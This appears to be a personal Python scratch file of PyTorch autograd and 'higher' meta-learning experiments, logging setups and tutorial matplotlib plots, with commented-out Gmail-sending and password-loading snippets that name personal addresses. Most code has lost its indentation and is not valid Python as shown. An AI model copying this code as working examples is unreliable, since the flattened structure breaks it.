    g1 = torch.randn(3, 3)
    g2 = torch.randn(3, 3)
    # concatenate along dim 0 -> a (6, 3) tensor
    print(torch.cat([g1, g2], dim=0).size())
#
# def inner_loop1():
# n_inner_iter = 5
# inner_opt = torch.optim.SGD(net.parameters(), lr=1e-1)
#
# qry_losses = []
# qry_accs = []
# meta_opt.zero_grad()
# for i in range(task_num):
# with higher.innerloop_ctx(
# net, inner_opt, copy_initial_weights=False
# ) as (fnet, diffopt):
# # Optimize the likelihood of the support set by taking
# # gradient steps w.r.t. the model's parameters.
# # This adapts the model's meta-parameters to the task.
# # higher is able to automatically keep copies of
# # your network's parameters as they are being updated.
# for _ in range(n_inner_iter):
# spt_logits = fnet(x_spt[i])
# spt_loss = F.cross_entropy(spt_logits, y_spt[i])
# diffopt.step(spt_loss)
#
# # The final set of adapted parameters will induce some
# # final loss and accuracy on the query dataset.
# # These will be used to update the model's meta-parameters.
# qry_logits = fnet(x_qry[i])
# qry_loss = F.cross_entropy(qry_logits, y_qry[i])
# qry_losses.append(qry_loss.detach())
# qry_acc = (qry_logits.argmax(
# dim=1) == y_qry[i]).sum().item() / querysz
# qry_accs.append(qry_acc)
#
# # Update the model's meta-parameters to optimize the query
# # losses across all of the tasks sampled in this batch.
# # This unrolls through the gradient steps.
# qry_loss.backward()
#
# meta_opt.step()
# qry_losses = sum(qry_losses) / task_num
# qry_accs = 100. * sum(qry_accs) / task_num
# i = epoch + float(batch_idx) / n_train_iter
# iter_time = time.time() - start_time
# def inner_loop2():
# n_inner_iter = 5
# inner_opt = torch.optim.SGD(net.parameters(), lr=1e-1)
#
# qry_losses = []
# qry_accs = []
# meta_opt.zero_grad()
# meta_loss = 0
# for i in range(task_num):
# with higher.innerloop_ctx(
# net, inner_opt, copy_initial_weights=False
# ) as (fnet, diffopt):
# # Optimize the likelihood of the support set by taking
# # gradient steps w.r.t. the model's parameters.
# # This adapts the model's meta-parameters to the task.
# # higher is able to automatically keep copies of
# # your network's parameters as they are being updated.
# for _ in range(n_inner_iter):
# spt_logits = fnet(x_spt[i])
# spt_loss = F.cross_entropy(spt_logits, y_spt[i])
# diffopt.step(spt_loss)
#
# # The final set of adapted parameters will induce some
# # final loss and accuracy on the query dataset.
# # These will be used to update the model's meta-parameters.
# qry_logits = fnet(x_qry[i])
# qry_loss = F.cross_entropy(qry_logits, y_qry[i])
# qry_losses.append(qry_loss.detach())
# qry_acc = (qry_logits.argmax(
# dim=1) == y_qry[i]).sum().item() / querysz
# qry_accs.append(qry_acc)
#
# # Update the model's meta-parameters to optimize the query
# # losses across all of the tasks sampled in this batch.
# # This unrolls through the gradient steps.
# # qry_loss.backward()
# meta_loss += qry_loss
#
# qry_losses = sum(qry_losses) / task_num
# qry_losses.backward()
# meta_opt.step()
# qry_accs = 100. * sum(qry_accs) / task_num
# i = epoch + float(batch_idx) / n_train_iter
# iter_time = time.time() - start_time
def error_unexpected_way_to_by_pass_safety():
# https://stackoverflow.com/questions/62415251/why-am-i-able-to-change-the-value-of-a-tensor-without-the-computation-graph-know
import torch
a = torch.tensor([1, 2, 3.], requires_grad=True)
# are detached tensor's leafs? yes they are
a_detached = a.detach()
# a.fill_(2) # illegal, warns you that a tensor which requires grads is used in an inplace op (so it won't be recorded in computation graph so it wont take the right derivative of the forward path as this op won't be in it)
a_detached.fill_(
2) # weird that this one is allowed, seems to allow me to bypass the error check from the previous comment...?!
print(f'a = {a}')
print(f'a_detached = {a_detached}')
a.sum().backward()
def detach_playground():
import torch
a = torch.tensor([1, 2, 3.], requires_grad=True)
# are detached tensor's leafs? yes they are
a_detached = a.detach()
print(f'a_detached.is_leaf = {a_detached.is_leaf}')
# is doing sum on the detached tensor a leaf? no
a_detached_sum = a.sum()
print(f'a_detached_sum.is_leaf = {a_detached_sum.is_leaf}')
# is detaching an intermediate tensor a leaf? yes
a_sum_detached = a.sum().detach()
print(f'a_sum_detached.is_leaf = {a_sum_detached.is_leaf}')
# shows they share they same data
print(f'a == a_detached = {a == a_detached}')
print(f'a is a_detached = {a is a_detached}')
a_detached.zero_()
print(f'a = {a}')
print(f'a_detached = {a_detached}')
# a.fill_(2) # illegal, warns you that a tensor which requires grads is used in an inplace op (so it won't be recorded in computation graph so it wont take the right derivative of the forward path as this op won't be in it)
a_detached.fill_(
2) # weird that this one is allowed, seems to allow me to bypass the error check from the previous comment...?!
print(f'a = {a}')
print(f'a_detached = {a_detached}')
## conclusion: detach basically creates a totally new tensor which cuts gradient computations to the original but shares the same memory with original
out = a.sigmoid()
out_detached = out.detach()
out_detached.zero_()
out.sum().backward()
def clone_playground():
import torch
a = torch.tensor([1, 2, 3.], requires_grad=True)
a_clone = a.clone()
print(f'a_clone.is_leaf = {a_clone.is_leaf}')
print(f'a is a_clone = {a is a_clone}')
print(f'a == a_clone = {a == a_clone}')
print(f'a = {a}')
print(f'a_clone = {a_clone}')
# a_clone.fill_(2)
a_clone.mul_(2)
print(f'a = {a}')
print(f'a_clone = {a_clone}')
a_clone.sum().backward()
print(f'a.grad = {a.grad}')
def clone_vs_deepcopy():
import copy
import torch
x = torch.tensor([1, 2, 3.])
x_clone = x.clone()
x_deep_copy = copy.deepcopy(x)
#
x.mul_(-1)
print(f'x = {x}')
print(f'x_clone = {x_clone}')
print(f'x_deep_copy = {x_deep_copy}')
print()
def inplace_playground():
import torch
x = torch.tensor([1, 2, 3.], requires_grad=True)
y = x + 1
print(f'x.is_leaf = {x.is_leaf}')
print(f'y.is_leaf = {y.is_leaf}')
    x += 1  # not allowed because x is a leaf that requires grad; an in-place op on it would discard the value autograd needs for backward (IMO, not the official explanation)
print(f'x.is_leaf = {x.is_leaf}')
def copy_initial_weights_playground_original():
import torch
import torch.nn as nn
import torch.optim as optim
import higher
import numpy as np
np.random.seed(1)
torch.manual_seed(3)
N = 100
actual_multiplier = 3.5
meta_lr = 0.00001
loops = 5 # how many iterations in the inner loop we want to do
x = torch.tensor(np.random.random((N, 1)), dtype=torch.float64) # features for inner training loop
y = x * actual_multiplier # target for inner training loop
    model = nn.Linear(1, 1, bias=False).double()  # simplest possible model - multiply input x by weight w without bias
meta_opt = optim.SGD(model.parameters(), lr=meta_lr, momentum=0.)
def run_inner_loop_once(model, verbose, copy_initial_weights):
lr_tensor = torch.tensor([0.3], requires_grad=True)
momentum_tensor = torch.tensor([0.5], requires_grad=True)
opt = optim.SGD(model.parameters(), lr=0.3, momentum=0.5)
with higher.innerloop_ctx(model, opt, copy_initial_weights=copy_initial_weights,
override={'lr': lr_tensor, 'momentum': momentum_tensor}) as (fmodel, diffopt):
for j in range(loops):
if verbose:
print('Starting inner loop step j=={0}'.format(j))
print(' Representation of fmodel.parameters(time={0}): {1}'.format(j, str(
list(fmodel.parameters(time=j)))))
print(' Notice that fmodel.parameters() is same as fmodel.parameters(time={0}): {1}'.format(j, (
list(fmodel.parameters())[0] is list(fmodel.parameters(time=j))[0])))
out = fmodel(x)
if verbose:
print(
' Notice how `out` is `x` multiplied by the latest version of weight: {0:.4} * {1:.4} == {2:.4}'.format(
x[0, 0].item(), list(fmodel.parameters())[0].item(), out[0].item()))
loss = ((out - y) ** 2).mean()
diffopt.step(loss)
if verbose:
# after all inner training let's see all steps' parameter tensors
print()
print("Let's print all intermediate parameters versions after inner loop is done:")
for j in range(loops + 1):
print(' For j=={0} parameter is: {1}'.format(j, str(list(fmodel.parameters(time=j)))))
print()
# let's imagine now that our meta-learning optimization is trying to check how far we got in the end from the actual_multiplier
weight_learned_after_full_inner_loop = list(fmodel.parameters())[0]
meta_loss = (weight_learned_after_full_inner_loop - actual_multiplier) ** 2
print(' Final meta-loss: {0}'.format(meta_loss.item()))
meta_loss.backward() # will only propagate gradient to original model parameter's `grad` if copy_initial_weight=False
if verbose:
print(' Gradient of final loss we got for lr and momentum: {0} and {1}'.format(lr_tensor.grad,
momentum_tensor.grad))
print(
' If you change number of iterations "loops" to much larger number final loss will be stable and the values above will be smaller')
return meta_loss.item()
print('=================== Run Inner Loop First Time (copy_initial_weights=True) =================\n')
meta_loss_val1 = run_inner_loop_once(model, verbose=True, copy_initial_weights=True)
print("\nLet's see if we got any gradient for initial model parameters: {0}\n".format(
list(model.parameters())[0].grad))
print('=================== Run Inner Loop Second Time (copy_initial_weights=False) =================\n')
meta_loss_val2 = run_inner_loop_once(model, verbose=False, copy_initial_weights=False)
print("\nLet's see if we got any gradient for initial model parameters: {0}\n".format(
list(model.parameters())[0].grad))
print('=================== Run Inner Loop Third Time (copy_initial_weights=False) =================\n')
final_meta_gradient = list(model.parameters())[0].grad.item()
# Now let's double-check `higher` library is actually doing what it promised to do, not just giving us
# a bunch of hand-wavy statements and difficult to read code.
# We will do a simple SGD step using meta_opt changing initial weight for the training and see how meta loss changed
meta_opt.step()
meta_opt.zero_grad()
    meta_step = - meta_lr * final_meta_gradient  # how much meta_opt actually shifted the initial weight value
meta_loss_val3 = run_inner_loop_once(model, verbose=False, copy_initial_weights=False)
def copy_initial_weights_playground():
import torch
import torch.nn as nn
import torch.optim as optim
import higher
import numpy as np
np.random.seed(1)
torch.manual_seed(3)
N = 100
actual_multiplier = 3.5 # the parameters we want the model to learn
meta_lr = 0.00001
loops = 5 # how many iterations in the inner loop we want to do
x = torch.randn(N, 1) # features for inner training loop
y = x * actual_multiplier # target for inner training loop
    model = nn.Linear(1, 1,
                      bias=False)  # model(x) = w*x, simplest possible model - multiply input x by weight w without bias; goal is w ~ actual_multiplier
outer_opt = optim.SGD(model.parameters(), lr=meta_lr, momentum=0.)
def run_inner_loop_once(model, verbose, copy_initial_weights):
lr_tensor = torch.tensor([0.3], requires_grad=True)
momentum_tensor = torch.tensor([0.5], requires_grad=True)
inner_opt = optim.SGD(model.parameters(), lr=0.3, momentum=0.5)
with higher.innerloop_ctx(model, inner_opt, copy_initial_weights=copy_initial_weights,
override={'lr': lr_tensor, 'momentum': momentum_tensor}) as (fmodel, diffopt):
for j in range(loops):
if verbose:
print('Starting inner loop step j=={0}'.format(j))
print(' Representation of fmodel.parameters(time={0}): {1}'.format(j, str(
list(fmodel.parameters(time=j)))))
print(' Notice that fmodel.parameters() is same as fmodel.parameters(time={0}): {1}'.format(j, (
list(fmodel.parameters())[0] is list(fmodel.parameters(time=j))[0])))
out = fmodel(x)
if verbose:
print(
f' Notice how `out` is `x` multiplied by the latest version of weight: {x[0, 0].item()} * {list(fmodel.parameters())[0].item()} == {out[0].item()}')
loss = ((out - y) ** 2).mean()
diffopt.step(loss)
if verbose:
# after all inner training let's see all steps' parameter tensors
print()
print("Let's print all intermediate parameters versions after inner loop is done:")
for j in range(loops + 1):
print(' For j=={0} parameter is: {1}'.format(j, str(list(fmodel.parameters(time=j)))))
print()
# let's imagine now that our meta-learning optimization is trying to check how far we got in the end from the actual_multiplier
weight_learned_after_full_inner_loop = list(fmodel.parameters())[0]
meta_loss = (weight_learned_after_full_inner_loop - actual_multiplier) ** 2
print(' Final meta-loss: {0}'.format(meta_loss.item()))
meta_loss.backward() # will only propagate gradient to original model parameter's `grad` if copy_initial_weight=False
if verbose:
print(' Gradient of final loss we got for lr and momentum: {0} and {1}'.format(lr_tensor.grad,
momentum_tensor.grad))
print(
' If you change number of iterations "loops" to much larger number final loss will be stable and the values above will be smaller')
return meta_loss.item()
print('=================== Run Inner Loop First Time (copy_initial_weights=True) =================\n')
meta_loss_val1 = run_inner_loop_once(model, verbose=True, copy_initial_weights=True)
print("\nLet's see if we got any gradient for initial model parameters: {0}\n".format(
list(model.parameters())[0].grad))
print('=================== Run Inner Loop Second Time (copy_initial_weights=False) =================\n')
meta_loss_val2 = run_inner_loop_once(model, verbose=False, copy_initial_weights=False)
print("\nLet's see if we got any gradient for initial model parameters: {0}\n".format(
list(model.parameters())[0].grad))
print('=================== Run Inner Loop Third Time (copy_initial_weights=False) =================\n')
final_meta_gradient = list(model.parameters())[0].grad.item()
# Now let's double-check `higher` library is actually doing what it promised to do, not just giving us
# a bunch of hand-wavy statements and difficult to read code.
# We will do a simple SGD step using meta_opt changing initial weight for the training and see how meta loss changed
outer_opt.step()
outer_opt.zero_grad()
    meta_step = - meta_lr * final_meta_gradient  # how much outer_opt actually shifted the initial weight value
meta_loss_val3 = run_inner_loop_once(model, verbose=False, copy_initial_weights=False)
meta_loss_gradient_approximation = (meta_loss_val3 - meta_loss_val2) / meta_step
print()
print(
'Side-by-side meta_loss_gradient_approximation and gradient computed by `higher` lib: {0:.4} VS {1:.4}'.format(
meta_loss_gradient_approximation, final_meta_gradient))
def tqdm_torchmeta():
from torchvision.transforms import Compose, Resize, ToTensor
import torchmeta
from torchmeta.datasets.helpers import miniimagenet
from pathlib import Path
from types import SimpleNamespace
from tqdm import tqdm
## get args
args = SimpleNamespace(episodes=5, n_classes=5, k_shot=5, k_eval=15, meta_batch_size=1, n_workers=4)
args.data_root = Path("~/automl-meta-learning/data/miniImagenet").expanduser()
## get meta-batch loader
train_transform = Compose([Resize(84), ToTensor()])
dataset = miniimagenet(
args.data_root,
ways=args.n_classes,
shots=args.k_shot,
test_shots=args.k_eval,
meta_split='train',
download=False)
dataloader = torchmeta.utils.data.BatchMetaDataLoader(
dataset,
batch_size=args.meta_batch_size,
num_workers=args.n_workers)
with tqdm(dataset):
print(f'len(dataloader)= {len(dataloader)}')
for episode, batch in enumerate(dataloader):
print(f'episode = {episode}')
train_inputs, train_labels = batch["train"]
print(f'train_labels[0] = {train_labels[0]}')
print(f'train_inputs.size() = {train_inputs.size()}')
pass
if episode >= args.episodes:
break
# if __name__ == "__main__":
# start = time.time()
# print('pytorch playground!')
# # params_in_comp_graph()
# # check_if_tensor_is_detached()
# # deep_copy_issue()
# # download_mini_imagenet()
# # extract()
# # download_and_extract_miniImagenet(root='~/tmp')
# # download_and_extract_miniImagenet(root='~/automl-meta-learning/data')
# # torch_concat()
# # detach_vs_cloe()
# # error_unexpected_way_to_by_pass_safety()
# # clone_playground()
# # inplace_playground()
# # clone_vs_deepcopy()
# # copy_initial_weights_playground()
# tqdm_torchmeta()
# print('--> DONE')
# time_passed_msg, _, _, _ = report_times(start)
# print(f'--> {time_passed_msg}')
# %%
import sys
print(sys.version) ##
print(sys.path)
def helloworld():
print('helloworld')
print('hello12345')
def union_dicts():
d1 = {'x': 1}
d2 = {'y': 2, 'z': 3}
d_union = {**d1, **d2}
print(d_union)
def get_stdout_old():
import sys
# contents = ""
# #with open('some_file.txt') as f:
# #with open(sys.stdout,'r') as f:
# # sys.stdout.mode = 'r'
# for line in sys.stdout.readlines():
# contents += line
# print(contents)
# print(sys.stdout)
# with open(sys.stdout.buffer) as f:
# print(f.readline())
# import subprocess
# p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# stdout = []
# while True:
# line = p.stdout.readline()
# stdout.append(line)
# print( line )
# if line == '' and p.poll() != None:
# break
# print( ''.join(stdout) )
import sys
myfile = "input.txt"
def print(*args):
__builtins__.print(*args, file=sys.__stdout__)
with open(myfile, "a+") as f:
__builtins__.print(*args, file=f)
print('a')
print('b')
print('c')
repr(sys.stdout)
def get_stdout():
import sys
myfile = "my_stdout.txt"
# redefine print
def print(*args):
__builtins__.print(*args, file=sys.__stdout__) # prints to terminal
with open(myfile, "a+") as f:
__builtins__.print(*args, file=f) # saves in a file
print('a')
print('b')
print('c')
def logging_basic():
import logging
logging.warning('Watch out!') # will print a message to the console
logging.info('I told you so') # will not print anything
def logging_to_file():
import logging
logging.basicConfig(filename='example.log', level=logging.DEBUG)
# logging.
logging.debug('This message should go to the log file')
logging.info('So should this')
logging.warning('And this, too')
def logging_to_file_INFO_LEVEL():
import logging
import sys
format = '{asctime}:{levelname}:{name}:lineno {lineno}:{message}'
logging.basicConfig(filename='example.log', level=logging.INFO, format=format, style='{')
# logging.basicConfig(stream=sys.stdout,level=logging.INFO,format=format,style='{')
# logging.
logging.debug('This message should NOT go to the log file')
logging.info('This message should go to log file')
logging.warning('This, too')
def logger_SO_print_and_write_to_my_stdout():
"""My sample logger code to print to screen and write to file (the same thing).
Note: trying to replace this old answer of mine using a logger:
- https://github.com/CoreyMSchafer/code_snippets/tree/master/Logging-Advanced
Credit:
- https://www.youtube.com/watch?v=jxmzY9soFXg&t=468s
- https://github.com/CoreyMSchafer/code_snippets/tree/master/Logging-Advanced
- https://stackoverflow.com/questions/21494468/about-notset-in-python-logging/21494716#21494716
Other resources:
- https://docs.python-guide.org/writing/logging/
- https://docs.python.org/3/howto/logging.html#logging-basic-tutorial
- https://stackoverflow.com/questions/61084916/how-does-one-make-an-already-opened-file-readable-e-g-sys-stdout/61255375#61255375
"""
from pathlib import Path
import logging
import os
import sys
from datetime import datetime
## create directory (& its parents) if it does not exist otherwise do nothing :)
# get current time
current_time = datetime.now().strftime('%b%d_%H-%M-%S')
logs_dirpath = Path(f'~/logs/python_playground_logs_{current_time}/').expanduser()
logs_dirpath.mkdir(parents=True, exist_ok=True)
my_stdout_filename = logs_dirpath / Path('my_stdout.log')
# remove my_stdout if it exists (note you can also just create a new log dir/file each time or append to the end of the log file your using)
# os.remove(my_stdout_filename) if os.path.isfile(my_stdout_filename) else None
## create top logger
logger = logging.getLogger(
__name__) # loggers are created in hierarchy using dot notation, thus __name__ ensures no name collisions.
logger.setLevel(
logging.DEBUG) # note: use logging.DEBUG, CAREFUL with logging.UNSET: https://stackoverflow.com/questions/21494468/about-notset-in-python-logging/21494716#21494716
## log to my_stdout.log file
file_handler = logging.FileHandler(filename=my_stdout_filename)
# file_handler.setLevel(logging.INFO) # not setting it means it inherits the logger. It will log everything from DEBUG upwards in severity to this handler.
log_format = "{asctime}:{levelname}:{lineno}:{name}:{message}" # see for logrecord attributes https://docs.python.org/3/library/logging.html#logrecord-attributes
formatter = logging.Formatter(fmt=log_format, style='{') # set the logging format at for this handler
file_handler.setFormatter(fmt=formatter)
## log to stdout/screen
stdout_stream_handler = logging.StreamHandler(
stream=sys.stdout) # default stderr, though not sure the advatages of logging to one or the other
# stdout_stream_handler.setLevel(logging.INFO) # Note: having different set levels means that we can route using a threshold what gets logged to this handler
log_format = "{name}:{levelname}:-> {message}" # see for logrecord attributes https://docs.python.org/3/library/logging.html#logrecord-attributes
formatter = logging.Formatter(fmt=log_format, style='{') # set the logging format at for this handler
stdout_stream_handler.setFormatter(fmt=formatter)
logger.addHandler(hdlr=file_handler) # add this file handler to top logger
logger.addHandler(hdlr=stdout_stream_handler) # add this file handler to top logger
logger.log(logging.NOTSET, 'notset')
logger.debug('debug')
logger.info('info')
logger.warning('warning')
logger.error('error')
logger.critical('critical')
def logging_unset_level():
"""My sample logger explaining UNSET level
Resources:
- https://stackoverflow.com/questions/21494468/about-notset-in-python-logging
- https://www.youtube.com/watch?v=jxmzY9soFXg&t=468s
- https://github.com/CoreyMSchafer/code_snippets/tree/master/Logging-Advanced
"""
import logging
logger = logging.getLogger(
__name__) # loggers are created in hierarchy using dot notation, thus __name__ ensures no name collisions.
print(f'DEFAULT VALUE: logger.level = {logger.level}')
file_handler = logging.FileHandler(filename='my_log.log')
log_format = "{asctime}:{levelname}:{lineno}:{name}:{message}" # see for logrecord attributes https://docs.python.org/3/library/logging.html#logrecord-attributes
formatter = logging.Formatter(fmt=log_format, style='{')
file_handler.setFormatter(fmt=formatter)
stdout_stream_handler = logging.StreamHandler(stream=sys.stdout)
stdout_stream_handler.setLevel(logging.INFO)
log_format = "{name}:{levelname}:-> {message}" # see for logrecord attributes https://docs.python.org/3/library/logging.html#logrecord-attributes
formatter = logging.Formatter(fmt=log_format, style='{')
stdout_stream_handler.setFormatter(fmt=formatter)
logger.addHandler(hdlr=file_handler)
logger.addHandler(hdlr=stdout_stream_handler)
logger.log(logging.NOTSET, 'notset')
logger.debug('debug')
logger.info('info')
logger.warning('warning')
logger.error('error')
logger.critical('critical')
def logger():
from pathlib import Path
import logging
# create directory (& its parents) if it does not exist otherwise do nothing :)
logs_dirpath = Path('~/automl-meta-learning/logs/python_playground_logs/').expanduser()
logs_dirpath.mkdir(parents=True, exist_ok=True)
my_stdout_filename = logs_dirpath / Path('my_stdout.log')
# remove my_stdout if it exists (used to have this but now I decided to create a new log & file each)
# os.remove(my_stdout_filename) if os.path.isfile(my_stdout_filename) else None
logger = logging.getLogger(
__name__) # loggers are created in hierarchy using dot notation, thus __name__ ensures no name collisions.
logger.setLevel(logging.INFO)
log_format = "{asctime}:{levelname}:{name}:{message}"
formatter = logging.Formatter(fmt=log_format, style='{')
file_handler = logging.FileHandler(filename=my_stdout_filename)
file_handler.setFormatter(fmt=formatter)
logger.addHandler(hdlr=file_handler)
logger.addHandler(hdlr=logging.StreamHandler())
for i in range(3):
logger.info(f'i = {i}')
logger.info(f'logger DONE')
def logging_example_from_youtube():
"""https://github.com/CoreyMSchafer/code_snippets/blob/master/Logging-Advanced/employee.py
"""
import logging
# import pytorch_playground # has employee class & code
import sys
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(name)s:%(message)s')
file_handler = logging.FileHandler('sample.log')
file_handler.setLevel(logging.ERROR)
file_handler.setFormatter(formatter)
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(formatter)
logger.addHandler(file_handler)
logger.addHandler(stream_handler)
logger.critical('not really critical :P')
def add(x, y):
"""Add Function"""
return x + y
def subtract(x, y):
"""Subtract Function"""
return x - y
def multiply(x, y):
"""Multiply Function"""
return x * y
def divide(x, y):
"""Divide Function"""
try:
result = x / y
except ZeroDivisionError:
logger.exception('Tried to divide by zero')
else:
return result
    logger.info(
        'testing if log info prints to the screen; it should, since the stream handler has no level set and the logger level is DEBUG.')
num_1 = 10
num_2 = 0
add_result = add(num_1, num_2)
logger.debug('Add: {} + {} = {}'.format(num_1, num_2, add_result))
sub_result = subtract(num_1, num_2)
logger.debug('Sub: {} - {} = {}'.format(num_1, num_2, sub_result))
mul_result = multiply(num_1, num_2)
logger.debug('Mul: {} * {} = {}'.format(num_1, num_2, mul_result))
div_result = divide(num_1, num_2)
logger.debug('Div: {} / {} = {}'.format(num_1, num_2, div_result))
def plot():
"""
source:
- https://www.youtube.com/watch?v=UO98lJQ3QGI
- https://github.com/CoreyMSchafer/code_snippets/blob/master/Python/Matplotlib/01-Introduction/finished_code.py
"""
from matplotlib import pyplot as plt
plt.xkcd()
ages_x = [18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35,
36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55]
py_dev_y = [20046, 17100, 20000, 24744, 30500, 37732, 41247, 45372, 48876, 53850, 57287, 63016, 65998, 70003, 70000,
71496, 75370, 83640, 84666,
84392, 78254, 85000, 87038, 91991, 100000, 94796, 97962, 93302, 99240, 102736, 112285, 100771, 104708,
108423, 101407, 112542, 122870, 120000]
plt.plot(ages_x, py_dev_y, label='Python')
js_dev_y = [16446, 16791, 18942, 21780, 25704, 29000, 34372, 37810, 43515, 46823, 49293, 53437, 56373, 62375, 66674,
68745, 68746, 74583, 79000,
78508, 79996, 80403, 83820, 88833, 91660, 87892, 96243, 90000, 99313, 91660, 102264, 100000, 100000,
91660, 99240, 108000, 105000, 104000]
plt.plot(ages_x, js_dev_y, label='JavaScript')
dev_y = [17784, 16500, 18012, 20628, 25206, 30252, 34368, 38496, 42000, 46752, 49320, 53200, 56000, 62316, 64928,
67317, 68748, 73752, 77232,
78000, 78508, 79536, 82488, 88935, 90000, 90056, 95000, 90000, 91633, 91660, 98150, 98964, 100000, 98988,
100000, 108923, 105000, 103117]
plt.plot(ages_x, dev_y, color='#444444', linestyle='--', label='All Devs')
plt.xlabel('Ages')
plt.ylabel('Median Salary (USD)')
plt.title('Median Salary (USD) by Age')
plt.legend()
plt.tight_layout()
plt.savefig('plot.png')
plt.show()
def subplot():
"""https://github.com/CoreyMSchafer/code_snippets/blob/master/Python/Matplotlib/10-Subplots/finished_code.py
"""
import pandas as pd
from matplotlib import pyplot as plt
plt.style.use('seaborn')
    data = pd.read_csv('data.csv')
ages = data['Age']
dev_salaries = data['All_Devs']
py_salaries = data['Python']
js_salaries = data['JavaScript']
fig1, ax1 = plt.subplots()
fig2, ax2 = plt.subplots()
ax1.plot(ages, dev_salaries, color='#444444',
linestyle='--', label='All Devs')
ax2.plot(ages, py_salaries, label='Python')
ax2.plot(ages, js_salaries, label='JavaScript')
ax1.legend()
ax1.set_title('Median Salary (USD) by Age')
ax1.set_ylabel('Median Salary (USD)')
ax2.legend()
ax2.set_xlabel('Ages')
ax2.set_ylabel('Median Salary (USD)')
plt.tight_layout()
plt.show()
fig1.savefig('fig1.png')
fig2.savefig('fig2.png')
#
# def import_utils_test():
# import uutils
# # import uutils.utils as utils
# # from uutils.utils import logger
#
# print(uutils)
# print(utils)
# print(logger)
#
# print()
def sys_path():
"""
python -c "import sys; print(sys.path)”
python -c "import sys; [print(p) for p in sys.path]"
"""
import sys
def path():
import sys
[print(p) for p in sys.path]
for path in sys.path:
print(path)
def pycharm_playground():
import tqdm
print('running pycharm playground...')
b = 0
print(b)
print('Intermediate print line')
print(b)
print(b)
print('Done!')
if __name__ == '__main__':
# union_dicts()
# get_stdout()
# logger()
# logger_SO_print_and_write_to_my_stdout()
# logging_basic()
# logging_to_file()
# logging_to_file()
# logging_to_file_INFO_LEVEL()
# logging_example_from_youtube()
# logging_unset_level()
# import_utils_test()
pycharm_playground()
    print('\n---> DONE\a\n\n')
# %%
import sys
print(sys.version)
# %%
## dictionary comprehension looping
d = {'a': 0, 'b': 1}
lst1 = [f'key:{k}' for k in d]
lst2 = [f'key:{k}, value:{v}' for k, v in d.items()]
print(lst1)
print(lst2)
# %%
## merging two dictionaries
d1 = {'a': 0, 'b': 1}
d2 = {'c': 2, 'd': 3}
d3 = {'e': 4, 'f': 5, 'g': 6}
d = {**d1, **d2, **d3}
print(d)
# %%
from collections import OrderedDict
od = OrderedDict([
('first', 1)
])
print(od)
od['first'] = 2
print(od)
lst = sum([i for i in range(3)])
print(lst)
od3 = OrderedDict([(i, i) for i in range(3)])
print(od3)
print(3 + float('Inf'))
# %%
# import pathlib
# from pathlib import Path
#
#
# def make_dirpath_current_datetime_hostname(path=None, comment='', replace_dots=True):
# '''
# make dir string: runs/CURRENT_DATETIME_HOSTNAME
# '''
# import socket
# import os
# from datetime import datetime
# # check if root is a PosixPath object
# if type(path) != pathlib.PosixPath and path is not None:
# path = Path(path)
# current_time = datetime.now().strftime('%b%d_%H-%M-%S')
# log_dir = os.path.join('runs', current_time + '_' + socket.gethostname() + comment)
# log_dir = Path(log_dir)
# print(log_dir._str)
# if replace_dots:
# log_dir = Path(log_dir._str.replace('.', '_'))
# if path is not None:
# log_dir = path / log_dir
# return log_dir
#
#
# print(type(Path('~')) == pathlib.PosixPath)
# print()
#
# log_dir = make_dirpath_current_datetime_hostname()
# print(log_dir)
# log_dir = make_dirpath_current_datetime_hostname('~')
# print(log_dir)
# log_dir = make_dirpath_current_datetime_hostname('~', '_jupyter')
# print(log_dir)
# log_dir = make_dirpath_current_datetime_hostname('~').expanduser()
# print(log_dir)
#
# string = "geeks for geeks geeks geeks geeks"
# # Prints the string by replacing geeks by Geeks
# print(string.replace("geeks", "Geeks"))
#
# log_dir = make_dirpath_current_datetime_hostname('~', '_jupyter', True)
# print(log_dir)
# %%
# adding keys to empty dic
d = {}
d['a'] = 3
print(d)
# %%
# unpack list?
(a, b, c) = [1, 2, 3]
print(a)
# %%
## kwargs
def f(*args, **kwargs):
print(args)
print(kwargs)
f()
f(1, 2, 3, a=1, b=2, c=3)
# %%
#
# import json
#
# from pathlib import Path
#
# p = Path('~/').expanduser()
# with open(p) as f:
# data = json.load(f)
# print(data)
# print(data['password'])
# %%
import subprocess
from subprocess import Popen, PIPE, STDOUT
cmd = 'ls /etc/fstab /etc/non-existent-file'
p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
output = p.stdout.read()
print(output)
# %%
import sys
print('a')
print(sys.stdout)
# %%
# from pathlib import Path
#
#
# def send_email(subject, message, destination, password_path=None):
# """ Send an e-mail from with message to destination email.
#
# NOTE: if you get an error with google gmails you might need to do this:
# https://stackoverflow.com/questions/16512592/login-credentials-not-working-with-gmail-smtp
# To use an app password:
# https://stackoverflow.com/questions/60975490/how-does-one-send-an-e-mail-from-python-not-using-gmail
#
# Arguments:
# message {str} -- message string to send.
# destination {str} -- destination email (as string)
# """
# from socket import gethostname
# from email.message import EmailMessage
# import smtplib
# import json
# import sys
#
# server = smtplib.SMTP('smtp.gmail.com', 587)
# smtplib.stdout = sys.stdout
# server.starttls()
# with open(password_path) as f:
# config = json.load(f)
# server.login('slurm.miranda@gmail.com', config['password'])
#
# # craft message
# msg = EmailMessage()
#
# # message = f'{message}\nSend from Hostname: {gethostname()}'
# # msg.set_content(message)
# msg['Subject'] = subject
# msg['From'] = 'slurm.miranda@gmail.com'
# msg['To'] = destination
# # send msg
# server.send_message(msg)
#
#
# ##
# print("-------> HELLOWWWWWWWW")
# p = Path('~/automl-meta-learning/automl/experiments/pw_app.config.json').expanduser()
# send_email(subject='TEST: send_email2', message='MESSAGE', destination='brando.science@gmail.com', password_path=p)
# %%
"""
Demo of the errorbar function, including upper and lower limits
"""
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.rcParams["errorbar.capsize"] = 3
# https://stackoverflow.com/questions/61415955/why-dont-the-error-limits-in-my-plots-show-in-matplotlib
# example data
x = np.arange(0.5, 5.5, 0.5)
y = np.exp(-x)
xerr = 0.1
yerr = 0.2
ls = 'dotted'
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
# standard error bars
